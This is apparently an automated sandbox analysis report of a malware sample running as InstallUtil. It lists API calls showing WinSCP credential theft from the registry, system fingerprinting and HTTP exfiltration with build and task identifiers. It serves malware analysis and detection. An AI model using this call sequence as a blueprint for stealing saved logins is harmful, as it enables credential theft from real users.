                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00406C72
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
                                                                                                                  • lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040754B
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040755D
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040756A
                                                                                                                  • _memmove.LIBCMT ref: 00407578
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00407586
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
                                                                                                                  • _memmove.LIBCMT ref: 004075A1
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
                                                                                                                  • HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
                                                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040762C
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00407638
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00407644
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                  • String ID: "$"$"$"$"$------$------$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$build_id$mode$status$task_id
                                                                                                                  • API String ID: 3702379033-3387599942
                                                                                                                  • Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                  • Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
                                                                                                                  • Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                  • Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 0040E1B7
                                                                                                                  • _memset.LIBCMT ref: 0040E1D7
                                                                                                                  • _memset.LIBCMT ref: 0040E1E8
                                                                                                                  • _memset.LIBCMT ref: 0040E1F9
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                  • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                  • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                  • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                  • API String ID: 463713726-2798830873
                                                                                                                  • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                  • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                                  • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                  • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  [Control-flow graph figure, starting at node 918 (405f39-405ffe); legend: Executed / Not Executed. Node and edge listing omitted.]
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                    • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                    • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                    • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                  • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                  • _memmove.LIBCMT ref: 00406639
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                  • _memmove.LIBCMT ref: 00406662
                                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                  • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                  • String ID: "$"$"$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$build_id$mode
                                                                                                                  • API String ID: 3702379033-116134722
                                                                                                                  • Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                  • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                                                  • Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                  • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 1262 418643-418653 call 41859a 1265 418844-4188a1 LoadLibraryA * 5 1262->1265 1266 418659-41883f call 407d47 GetProcAddress * 20 1262->1266 1268 4188a3-4188b0 GetProcAddress 1265->1268 1269 4188b5-4188bc 1265->1269 1266->1265 1268->1269 1270 4188e7-4188ee 1269->1270 1271 4188be-4188e2 GetProcAddress * 2 1269->1271 1273 4188f0-4188fd GetProcAddress 1270->1273 1274 418902-418909 1270->1274 1271->1270 1273->1274 1275 41890b-418918 GetProcAddress 1274->1275 1276 41891d-418924 1274->1276 1275->1276 1278 418926-41894a GetProcAddress * 2 1276->1278 1279 41894f 1276->1279 1278->1279
                                                                                                                  APIs
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                  • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                  • GetProcAddress.KERNEL32(75A70000,004184C2), ref: 004188AA
                                                                                                                  • GetProcAddress.KERNEL32(75290000,004184C2), ref: 004188C5
                                                                                                                  • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,004184C2), ref: 004188F7
                                                                                                                  • GetProcAddress.KERNEL32(75450000,004184C2), ref: 00418912
                                                                                                                  • GetProcAddress.KERNEL32(76E90000,004184C2), ref: 0041892D
                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2238633743-0
                                                                                                                  • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                  • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                                  • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                  • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 1280 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 
call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                    • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                    • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                    • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                    • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                    • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                    • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                    • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                    • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                    • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                    • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                    • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                    • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                    • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                    • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                  • GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB
                                                                                                                    • Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
                                                                                                                    • Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
                                                                                                                    • Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E
                                                                                                                    • Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                    • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                    • Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                    • Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                    • Part of subcall function 00411807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                    • Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                    • Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                    • Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                    • Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                    • Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                    • Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                    • Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                    • Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                    • Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                    • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                    • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                    • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                    • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                    • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                    • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                    • Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
                                                                                                                    • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
                                                                                                                    • Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
                                                                                                                    • Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
                                                                                                                    • Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
                                                                                                                    • Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
                                                                                                                    • Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB
                                                                                                                    • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                    • Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                    • Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                    • Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                    • Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                    • Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                    • Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                    • Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                    • Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D
                                                                                                                    • Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                    • Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                    • Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                    • Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
